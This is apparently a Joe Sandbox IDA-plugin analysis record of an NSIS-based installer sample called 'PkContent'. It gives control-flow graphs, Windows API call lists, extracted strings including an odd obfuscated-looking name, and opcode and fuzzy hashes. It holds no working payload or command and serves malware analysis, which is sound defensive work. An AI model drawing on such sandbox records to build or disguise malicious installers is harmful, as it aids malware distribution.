                                                      • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                      • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                      • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                      APIs
                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                      • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                      • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                      • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                      • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                        • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                      • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                      • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                      • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                      • API String ID: 608394941-1650083594
                                                      • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                      • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                      • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                      • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • lstrcatW.KERNEL32(00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401A76
                                                      • CompareFileTime.KERNEL32(-00000014,?,TravelersDevelopingImpactsJewsInstructorOriginal,TravelersDevelopingImpactsJewsInstructorOriginal,00000000,00000000,TravelersDevelopingImpactsJewsInstructorOriginal,004CB0B0,00000000,00000000), ref: 00401AA0
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TravelersDevelopingImpactsJewsInstructorOriginal
                                                      • API String ID: 4286501637-4034153992
                                                      • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                      • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                      • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                      • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403598
                                                      • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                      Strings
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                      • soft, xrefs: 00403675
                                                      • Error launching installer, xrefs: 004035D7
                                                      • Null, xrefs: 0040367E
                                                      • Inst, xrefs: 0040366C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 4283519449-527102705
                                                      • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                      • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                      • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                      • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004033E7
                                                      • GetTickCount.KERNEL32 ref: 00403464
                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                      • wsprintfW.USER32 ref: 004034A4
                                                      • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                      • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: CountFileTickWrite$wsprintf
                                                      • String ID: ... %d%%$P1B$X1C$X1C
                                                      • API String ID: 651206458-1535804072
                                                      • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                      • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                      • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                      • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                      APIs
                                                      • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2740478559-0
                                                      • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                      • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                      • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                      • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                      APIs
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FreeGloballstrcpyn
                                                      • String ID: Exch: stack < %d elements$Pop: stack empty$TravelersDevelopingImpactsJewsInstructorOriginal
                                                      • API String ID: 1459762280-2310787730
                                                      • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                      • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                      • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                      • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                      • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      • GlobalFree.KERNELBASE(00000000), ref: 00402387
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
